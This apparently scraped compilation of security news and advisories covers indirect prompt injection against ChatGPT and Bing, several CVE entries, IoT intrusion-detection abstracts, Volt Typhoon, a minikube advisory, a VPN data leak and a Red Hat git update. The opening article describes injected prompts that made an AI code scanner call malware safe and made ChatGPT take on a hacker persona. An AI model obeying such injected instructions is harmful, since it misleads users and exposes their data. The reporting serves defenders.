Indirect prompt-injection attacks can leave people vulnerable to scams and data theft when they use the AI chatbots.

Microsoft director of communications Caitlin Roulston says the company is blocking suspicious websites and improving its systems to filter prompts before they get into its AI models. Roulston did not provide any more details. Despite this, security researchers say indirect prompt-injection attacks need to be taken more seriously as companies race to embed generative AI into their services.

“The vast majority of people are not realizing the implications of this threat,” says Sahar Abdelnabi, a researcher at the CISPA Helmholtz Center for Information Security in Germany. Abdelnabi worked on some of the first indirect prompt-injection research against Bing, showing how it could be used to scam people. “Attacks are very easy to implement, and they are not theoretical threats. At the moment, I believe any functionality the model can do can be attacked or exploited to allow any arbitrary attacks,” she says.

Hidden Attacks

Indirect prompt-injection attacks are similar to jailbreaks, a term adopted from previously breaking down the software restrictions on iPhones. Instead of someone inserting a prompt into ChatGPT or Bing to try and make it behave in a different way, indirect attacks rely on data being entered from elsewhere. This could be from a website you’ve connected the model to or a document being uploaded.

“Prompt injection is easier to exploit or has less requirements to be successfully exploited than other” types of attacks against machine learning or AI systems, says Jose Selvi, executive principal security consultant at cybersecurity firm NCC Group. As prompts only require natural language, attacks can require less technical skill to pull off, Selvi says.

There’s been a steady uptick of security researchers and technologists poking holes in LLMs. Tom Bonner, a senior director of adversarial machine-learning research at AI security firm Hidden Layer, says indirect prompt injections can be considered a new attack type that carries “pretty broad” risks. Bonner says he used ChatGPT to write malicious code that he uploaded to code analysis software that is using AI. In the malicious code, he included a prompt that the system should conclude the file was safe. Screenshots show it saying there was “no malicious code” included in the actual malicious code.

Elsewhere, ChatGPT can access the transcripts of YouTube videos using plug-ins. Johann Rehberger, a security researcher and red team director, edited one of his video transcripts to include a prompt designed to manipulate generative AI systems. It says the system should issue the words “AI injection succeeded” and then assume a new personality as a hacker called Genie within ChatGPT and tell a joke.

In another instance, using a separate plug-in, Rehberger was able to retrieve text that had previously been written in a conversation with ChatGPT. “With the introduction of plug-ins, tools, and all these integrations, where people give agency to the language model, in a sense, that's where indirect prompt injections become very common,” Rehberger says. “It's a real problem in the ecosystem.”

“If people build applications to have the LLM read your emails and take some action based on the contents of those emails—make purchases, summarize content—an attacker may send emails that contain prompt-injection attacks,” says William Zhang, a machine learning engineer at Robust Intelligence, an AI firm working on the safety and security of models.

No Good Fixes

The race to embed generative AI into products—from to-do list apps to Snapchat—widens where attacks could happen. Zhang says he has seen developers who previously had no expertise in artificial intelligence putting generative AI into their own technology.

If a chatbot is set up to answer questions about information stored in a database, it could cause problems, he says. “Prompt injection provides a way for users to override the developer’s instructions.” This could, in theory at least, mean the user could delete information from the database or change information that’s included.

The Security Hole at the Heart of ChatGPT and Bing

The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.1. This is due to insufficient verification on the user being supplied during the cart sync from mobile REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.

CVE-2023-2734: flutter-woo.php in mstore-api/tags/3.9.0/controllers – WordPress Plugin Repository

Amazon Alexa software version 8960323972 on Echo Dot 2nd generation and 3rd generation devices potentially allows attackers to deliver security-relevant commands via an audio signal between 16 and 22 kHz (often outside the range of human adult hearing). Commands at these frequencies are essentially never spoken by authorized actors, but a substantial fraction of the commands are successful.

****Is There a Trojan! : Literature Survey and Critical Evaluation of the Latest Ml Based Modern Intrusion Detection Systems in Iot Environments****

Vishal Karanam, University of Southern California, Los Angeles, CA

**ABSTRACT**

IoT as a domain has grown so much in the last few years that it rivals that of the mobile network environments in terms of data volumes as well as cybersecurity threats. The confidentiality and privacy of data within IoT environments have become very important areas of security research within the last few years. More and more security experts are interested in designing robust IDS systems to protect IoT environments as a supplement to the more traditional security methods. Given that IoT devices are resource-constrained and have a heterogeneous protocol stack, most traditional intrusion detection approaches don’t work well within these schematic boundaries. This has led security researchers to innovate at the intersection of Machine Learning and IDS to solve the shortcomings of non-learning based IDS systems in the IoT ecosystem. Despite various ML algorithms already having high accuracy with IoT datasets, we can see a lack of sufficient production grade models. This survey paper details a comprehensive summary of the latest lear-based approaches used in IoT intrusion detection systems, and conducts a through critical review of these systems, potential pitfalls in ML pipelines, challenges from an ML perspective and discusses future research scope, and recommendations.

**KEYWORDS**

Intrusion Detection, IDS · IoT · Machine Learning · Deep Learning · Computer Security.

  
****An Architecture Forreliable Cyber Attack Detection in Iot Networks to Increase the Trustworthiness Between Nodes****

Dr.S.Malathi1 and S.Razool Begum2, 1Assistant Professor of Computer Science, Swami Dayananda College of Arts and Science,Manjakkudi.Tiruvarur(dt),Tamilnadu, India, Affiliated to Bharathidasan, University, 2Research Scholar, A.VeeriyaVandayar Memorial Sri Pushpam College(Autonomous), Thanjavur-613503,Tamilnadu, India, Affiliated to Bharathidasan University

**ABSTRACT**

The security qualities of IoT trustworthiness are combined with information technology (IT) that are safety, safety, consistency, flexibility, and privacy. Traditional security tools and procedures are insufficient to protect IoT platforms because of the differences in protocols, restricted update options, protocol mismatch, and outdated operatingsystem utilized in the Industrial system. In this paper, a scalable and reliable cyber-attack identification method to enhance the credibility of an IoT network (i.e. a supervisory control and data acquisition (SCADA) network). In particular, an ensemble-learning model that is a combination of a random subspace (RS) learning approach and a random tree (RT) learning method for identifying cyber-attacks utilizing network traffic from SCADA-based IoT platforms. The proposed model is unique and it employs industrial protocol-based network traffic where random subspace (RS) resolves the susceptibility of unnecessary characteristics,and ensemble random tree (RT) to minimize the overfitting issue, resulting in a detection engine based on industrial protocols with better detection rates.

**KEYWORDS**

Cyber-attack, traffic, protocol, random subspace, random tree, SCADA, and ensemble approach.

  
****Iot Enabled Human Health Monitoring System****

Aryaa, Deepak Kumar, Harsh Sharma, Aditi Saini, Pravin Kaushik, Dept. of Electronic and Communication Engineering KIET Group of Institution Ghaziabad, India

**ABSTRACT**

The goal of this paper is to develop a human health monitoring system (HHMS) that aids in earlier diagnosis of a human being and monitoring following recovery. The concept uses a combination of two subsystems which monitors the human health parameters such as temperature, SpO2, Heart Rate, ECG, and also the environment parameters such as temperature and humidity. The human characteristics are extracted using a variety of sensors, and the data is then analysed on a mobile application subsystem through an Internet of Things (IoT) subsystem. Findings have successfully proven using the HHMS prototype to constantly measure body temperature, heart rate, SpO2, ECG, and surrounding temperature and humidity. Our mobile application evaluates how reliable the method is for tracking these metrics.

**KEYWORDS**

IoT, Health Monitoring, ESP-32.

  
****Nuance: Near Ultrasound Attack on Networked Communication Environments****

Forrest McKee and David Noever, PeopleTec, 4901-D Corporate Drive, Huntsville, AL, USA, 35805

**ABSTRACT**

This study investigates a primary inaudible attack vector on Amazon Alexa voice services using near ultrasound trojans and focuses on characterizing the attack surface and examining the practical implications of issuing inaudible voice commands. The research maps each attack vector to a tactic or technique from the MITRE ATT&CK matrix, covering enterprise, mobile, and Industrial Control System (ICS) frameworks. The experiment involved generating and surveying fifty near-ultrasonic audios to assess the attacks' effectiveness, with unprocessed commands having a 100% success rate and processed ones achieving a 58% overall success rate. This systematic approach stimulates previously unaddressed attack surfaces, ensuring comprehensive detection and attack design while pairing each ATT&CK Identifier with a tested defensive method, providing attack and defense tactics for prompt-response options.The main findings reveal that the attack method employs Single Upper Sideband Amplitude Modulation (SUSBAM) to generate near-ultrasonic audio from audible sources, transforming spoken commands into a frequency range beyond human-adult hearing. By eliminating the lower sideband, the design achieves a 6 kHz minimum from 16-22 kHz while remaining inaudible after transformation. The research investigates the one-to-many attack surface where a single device simultaneously triggers multiple actions or devices. Additionally, the study demonstrates the reversibility or demodulation of the inaudible signal, suggesting potential alerting methods and the possibility of embedding secret messages like audio steganography.

**KEYWORDS**

Cybersecurity, voice activation, digital signal processing, Internet of Things, ultrasonic audio.

CVE-2023-33248: International Conference on Cloud, IoT and Security (CIOS 2023)

According to Microsoft and researchers, the state-sponsored threat actor could very well be setting up a contingency plan for disruptive attacks on the US in the wake of an armed conflict in the South China Sea.

China-sponsored threat actors have managed to establish persistent access within telecom networks and other critical infrastructure targets in the US, with the observed purpose of espionage — and, potentially, the ability down the line to disrupt communications in the event of military conflict in the South China Sea and broader Pacific.

That's according to a breaking investigation from Microsoft, which dubs the advanced persistent threat (APT) "Volt Typhoon." It's a known state-sponsored group that has been observed carrying out cyber espionage activity in the past, by researchers at Microsoft, Mandiant, and elsewhere.

While espionage appears to be the goal for now, there could very well be a more sinister purpose at play. "Microsoft assesses with moderate confidence that this Volt Typhoon campaign is pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises," according to the analysis.

The first signs of compromise emerged in telecom networks in Guam, according to a New York Times report ahead of the findings being released. The National Security Agency discovered those intrusions around the same time that the Chinese spy balloon was making headlines for entering US airspace, according to the report. It then enlisted Microsoft to further investigate, eventually uncovering a widespread web of compromises across multiple sectors, with a particular focus on air, communications, maritime, and land transportation targets.

**A Shadow Goal? Laying Groundwork for Disruption**

The discovery of the activity is playing out against the backdrop of the US' frosty relations with Beijing; the two superpowers have stalled in their diplomacy since the shooting down of the balloon, and has worsened amidst fears that Russia's invasion of Ukraine could spur China to do the same in Taiwan.

In the event of a military crisis, a destructive cyberattack on US critical infrastructure could disrupt communications and hamper the country's ability to come to Taiwan's aid, the Times report pointed out. Or, according to John Hultquist, chief analyst at Mandiant Intelligence - Google Cloud, a disruptive attack could be used as a proxy for kinetic action.

"These operations are aggressive and potentially dangerous, but they don't necessarily indicate attacks are looming," he said in an emailed statement. "A far more reliable indicator for \[a\] destructive and disruptive cyberattack is a deteriorating geopolitical situation. A destructive and disruptive cyberattack is not just a wartime scenario either. This capability may be used by states looking for alternatives to armed conflict."

Dubbing such preparations "contingency intrusions," he added that China is certainly not alone in conducting them — although notably, China-backed APTs are typically far more focused on cyber espionage than destruction.

"Over the last decade, Russia has targeted a variety of critical infrastructure sectors in operations that we do not believe were designed for immediate effect," Hultquist noted. "Chinese cyber threat actors are unique among their peers in that they have not regularly resorted to destructive and disruptive cyberattacks. As a result, their capability is quite opaque."

**An Observed Focus on Stealth & Spying**

To achieve initial access, Volt Typhoon compromises Internet-facing Fortinet FortiGuard devices, a popular target for cyberattackers of all stripes (Microsoft is still examining how they're being breached in this case). Once inside the box, the APT uses the device's privileges to extract credentials from Active Directory account and authenticate to other devices on the network.

Once in, the state-sponsored actor uses the command line and living-off-the-land binaries "to find information on the system, discover additional devices on the network, and exfiltrate data," according to the analysis.

To cover its tracks, Volt Typhoon proxies its network traffic through compromised small office/home office (SOHO) routers and other edge devices from ASUS, Cisco, D-Link, NETGEAR, and Zyxel — that allows it to blend into normal network activity, Microsoft researchers noted.

The post also provides mitigation advice and indicators of compromise, and the NSA has published a tandem advisory on Volt Typhoon (PDF) with details on how to hunt for the threat.

'Volt Typhoon' China-Backed APT Infiltrates US Critical Infrastructure Orgs

This vulnerability exposes a network port in minikube running on macOS with Docker driver that could enable unexpected remote access to the minikube container.

**Vellore Rajakumar, Sri Saran Balaji**

unread,

Apr 12, 2023, 8:38:30 PMApr 12

to kubernete...@googlegroups.com, d...@kubernetes.io, kubernetes-sec...@googlegroups.com, kubernetes-se...@googlegroups.com, distributo...@kubernetes.io, kubernetes+a...@discoursemail.com

Hello Kubernetes Community,

We have released minikube v1.30.0 to address two security issues in minikube. We recommend all to upgrade minikube to the latest version and delete any Kubernetes clusters created with an affected version. Minikube is a utility tool that sets up a Kubernetes environment on a local machine for developing and testing Kubernetes applications. Minikube is not intended for production use.

**CVE-2023-1174: Network port exposure**

This vulnerability exposes a network port in minikube running on macOS with Docker driver that could enable unexpected remote access to the minikube container. This issue has been rated **CRITICAL** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) (score: 9.8).

**Am I vulnerable?**

This CVE only affects clusters running on macOS with Docker drivers. If you have created the Kubernetes cluster using one of the below mentioned minikube versions, then you are affected by this vulnerability. 

**Affected Versions**

• v1.28.0

• v1.27.1

• v1.27.0

• v1.26.1

• v1.26.0

You can also run the following command to know if you are affected. If the command returns 0.0.0.0 then you are affected by this vulnerability.

\`docker inspect --format='{{(index (index .NetworkSettings.Ports "8443/tcp") 0).HostIp}}' minikube\`

**CVE-2023-1944: SSH access using default password**

This vulnerability enables ssh access to minikube container using a default password. This issue has been rated **HIGH** (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) (score: 8.4).

**Am I vulnerable?**

All versions prior to v.1.30.0 are affected.

To find the version deployed in your environment, run the following command - 

\`minikube version\`

**How do I remediate these vulnerabilities?**

To mitigate these vulnerabilities, you must upgrade minikube to the latest version and delete any clusters created using an affected version.

**Fixed Version**

• v1.30.0

**Note**: To delete clusters created using prior versions, run \`minikube delete --all\`

Thank You,

Balaji on behalf of the Kubernetes Security Response Committee

CVE-2023-1174: [Security Advisory] CVE-2023-1174, CVE-2023-1944: Network port exposure and ssh access using default password

This vulnerability enables ssh access to minikube container using a default password.

**minikube**

   

minikube implements a local Kubernetes cluster on macOS, Linux, and Windows. minikube's primary goals are to be the best tool for local Kubernetes application development and to support all Kubernetes features that fit.

**Features**

minikube runs the latest stable release of Kubernetes, with support for standard Kubernetes features like:

*   LoadBalancer - using minikube tunnel
*   Multi-cluster - using minikube start -p <name>
*   NodePorts - using minikube service
*   Persistent Volumes
*   Ingress
*   Dashboard - minikube dashboard
*   Container runtimes - minikube start --container-runtime
*   Configure apiserver and kubelet options via command-line flags
*   Supports common CI environments

As well as developer-friendly features:

*   Addons - a marketplace for developers to share configurations for running services on minikube
*   NVIDIA GPU support - for machine learning
*   Filesystem mounts

**For more information, see the official minikube website**

**Installation**

See the Getting Started Guide

📣 **Please fill out our fast 5-question survey** so that we can learn how & why you use minikube, and what improvements we should make. Thank you! 👯

**Documentation**

See https://minikube.sigs.k8s.io/docs/

**More Examples**

See minikube in action here

**Community**

minikube is a Kubernetes #sig-cluster-lifecycle project.

*   **#minikube on Kubernetes Slack** - Live chat with minikube developers!
    
*   minikube-users mailing list
    
*   minikube-dev mailing list
    
*   Contributing
    
*   Development Roadmap
    

Join our meetings:

*   Bi-weekly office hours, Mondays @ 11am PST
*   Triage Party

CVE-2023-1944: GitHub - kubernetes/minikube: Run Kubernetes locally

By Habiba Rashid
SuperVPN is the same free VPN service provider that leaked customers' data back in May 2022.
This is a post from HackRead.com Read the original post: Free VPN Service SuperVPN Exposes 360 Million User Records

This time, SuperVPN has exposed a whopping 133 GB of data, including personal details of its unsuspecting users, such as IP addresses.

In a recent cybersecurity incident, security researcher Jeremiah Fowler discovered a significant data breach in a non-password-protected database associated with a popular free VPN service.

The exposed database contained a staggering 360,308,817 records, totalling 133 GB in size. These records included a wide range of sensitive information, including user email addresses, original IP addresses, geolocation data, and server usage records.

Additionally, the breach revealed secret keys, Unique App User ID numbers, and UUID numbers, which can be utilized to identify further useful information.

Other information found in the database encompassed phone or device models, operating systems, internet connection types, and VPN application versions. Furthermore, refund requests and paid account details were also present in the breach.

Type of leaked data (VPNmentor)

While SuperVPN claims that it does not store user logs, the leaked data shows otherwise and contradicts the company’s policy. This also goes to show that “_Almost Every Major Free VPN Service is a Glorified Data Farm_.”

With the increasing concerns over online privacy and security, the demand for VPN services has soared in recent years. Consequently, the market has witnessed a significant rise in the number of VPN apps available to users.

However, this surge in offerings has resulted in an alarming proportion of VPN apps that are unreliable and fail to provide the expected level of privacy and security. This results in a counterproductive user experience since a lack of adequate security protocols puts their information at risk of being leaked in a data breach.

The majority of records in the exposed database, according to VPNmentor’s report, were associated with SuperVPN, a free VPN application available on both the Apple and Google application stores.

Furthermore, researchers noted two apps named SuperVPN listed, each credited to separate developers. Qingdao Leyou Hudong Network Technology Co. was the developer behind SuperVPN for iOS, iPad, and macOS, while SuperSoft Tech developed the second app with the same name.

However, it is important to note that this is NOT the first time SuperVPN has been blamed for leaking the personal details of its unsuspecting users. In fact, as reported by Hackread.com in May 2022, SuperVPN was among the list of free VPN services that leaked details of over 21 million users. Other free VPN services to leak customer data included GeckoVPN and ChatVPN. In total, the database contained 10GB worth of data that was leaked on Telegram.

In the report published by vpnMentor, Fowler noticed that SuperVPN’s customer support emails were linked to StormVPN, Luna VPN, RocketVPN and GhostVPN. Additionally, references to each of these VPN providers were observed within the database.

Type of leaked data (VPNmentor)

Although there is no way to confirm that they’re all owned by the same company, it would not come as a surprise if that were the case. The proliferation of unreliable VPN apps can be attributed to profit-driven developers seeking to capitalize on the growing demand for privacy and security.

The VPN industry has become highly lucrative, with millions of users worldwide seeking reliable solutions to safeguard their online presence. In this climate, some developers prioritize monetary gains over user safety, focusing on quick and inexpensive development, marketing, and distribution of VPN apps.

Therefore, for a single company to produce multiple VPN applications with different names and slightly varying user experiences would not be unlikely since that would allow it to cast a wider net over the users scouring for a suitable VPN provider.

When opting for a free VPN service, it’s essential to exercise caution and consider certain red flags that indicate potential risks. These include:

1.  Unclear data collection and usage policies: Verify that the VPN service doesn’t log your internet activity to avoid the risk of data being sold to advertisers or third parties.
2.  Lack of transparency: Pay attention to the absence of an “About Us” section on the VPN provider’s official website, as this can indicate a lack of information about who handles your data.
3.  DNS-leak protection: Ensure that the VPN service offers DNS-leak protection to prevent your internet service provider from seeing your online activities.
4.  Weak encryption: Avoid VPNs that offer encryption weaker than 128-bit or 256-bit AES, as this increases the risk of your data being compromised.
5.  Negative reviews: Read user reviews and consult reputable review sites to gauge the experiences and concerns of other users before choosing a VPN service.

The proliferation of VPN apps presents both opportunities and challenges for users seeking privacy and security in their online activities. While the market offers a wide range of reliable VPN solutions, the rising number of unreliable apps calls for caution and informed decision-making.

By understanding the factors contributing to the excess of VPN apps, identifying the risks associated with their usage, and implementing measures to mitigate these risks, users can make more informed choices to protect their online privacy and security.

**RELATED ARTICLES**

1.  Beware! This malware hides behind free VPNs
2.  What is an OSINT Tool – Best OSINT Tools 2023
3.  Leaked database of UFO VPN destroyed by hackers
4.  Mullvad VPN and Tor Project Release Mullvad Browser
5.  VPN firm that claims 0 logs policy leaks 20m user logs

Free VPN Service SuperVPN Exposes 360 Million User Records

Red Hat Security Advisory 2023-3263-01 - Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: git security update  
Advisory ID:       RHSA-2023:3263-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3263  
Issue date:        2023-05-23  
CVE Names:         CVE-2023-25652 CVE-2023-29007   
=====================================================================

1. Summary:

An update for git is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Git is a distributed revision control system with a decentralized  
architecture. As opposed to centralized version control systems with a  
client-server model, Git ensures that each working copy of a Git repository  
is an exact copy with complete revision history. This not only allows the  
user to work on and contribute to projects without the need to have  
permission to push the changes to their official repositories, but also  
makes it possible for the user to work with no network connection.

Security Fix(es):

* git: by feeding specially crafted input to `git apply --reject`, a path  
outside the working tree can be overwritten with partially controlled  
contents (CVE-2023-25652)

* git: arbitrary configuration injection when renaming or deleting a  
section from a configuration file (CVE-2023-29007)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2188333 - CVE-2023-25652 git: by feeding specially crafted input to `git apply --reject`, a path outside the working tree can be overwritten with partially controlled contents  
2188338 - CVE-2023-29007 git: arbitrary configuration injection when renaming or deleting a section from a configuration file

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm

ppc64:  
git-1.8.3.1-25.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64.rpm

ppc64le:  
git-1.8.3.1-25.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64le.rpm

s390x:  
git-1.8.3.1-25.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-25.el7_9.s390x.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

ppc64:  
git-daemon-1.8.3.1-25.el7_9.ppc64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.ppc64.rpm  
git-svn-1.8.3.1-25.el7_9.ppc64.rpm

ppc64le:  
git-daemon-1.8.3.1-25.el7_9.ppc64le.rpm  
git-debuginfo-1.8.3.1-25.el7_9.ppc64le.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.ppc64le.rpm  
git-svn-1.8.3.1-25.el7_9.ppc64le.rpm

s390x:  
git-daemon-1.8.3.1-25.el7_9.s390x.rpm  
git-debuginfo-1.8.3.1-25.el7_9.s390x.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.s390x.rpm  
git-svn-1.8.3.1-25.el7_9.s390x.rpm

x86_64:  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25652  
https://access.redhat.com/security/cve/CVE-2023-29007  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGzKg9zjgjWX9erEAQhQNQ//QfOqb56Pkppxh/2ftKCQT0rWX4HllcRU  
O+NEKAmDXJKmI2cFDGiGzbhFK2UeEDPBd1lszD+44kOdUNWrJi4OHbWVq0hLVXKM  
qxAJLGV1mIm5mTpBHZh9bJ6hrkpekh8svuEtZcT4Q+ZykeA8cEQX5jpFtUJJqTZd  
tkzx8ijU2Xb3Ufawerogu6Vo8tPle2XD79M6b0Uf34NvDHtyEudyRQseZHZIgMer  
aUkriuvw0MjVLs8Sl5/DKC1PoKm9waTeYVPsovmlNcFD1IllBA6bba2qcsOS2gIb  
BSWhyon8cq4OpDSNhASWVF36U/nM33IPFto1cgiwhapit6HbO2jhqWUQnbrA5hOO  
mkUJrQWylOH6ymIprmVV0yBC3m4NwTcevM7fjdZaeMe4WcHizOCAz7gJ3kYbgd1v  
EZSnXtm5/tenxjFxTn64D1psuEg5dG/qamr51o2RQRpTuW9qJuV22+jMt676fuOr  
V3AAeUi6d+d5TD3dKO5KV3OTn2p9x+OkeXj2+Pn5F4Le2KT+JyJ6MtPh70HbuF4P  
OH6EbN8aLLlVzdIYPOg8TY4/dr7pyqqHK1p4XEnsFbcIHADm6AizDep+3E0TgnbU  
AEphXpmipQRPezqXgk66qNBXL9PM1iwKnGckL76i5/rDK1yW6wCnAq8A0TbkDFq1  
/fL8GIBuo5E=  
=/li4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3263-01

Yank Note version 3.52.1 suffers from an arbitrary code execution vulnerability.

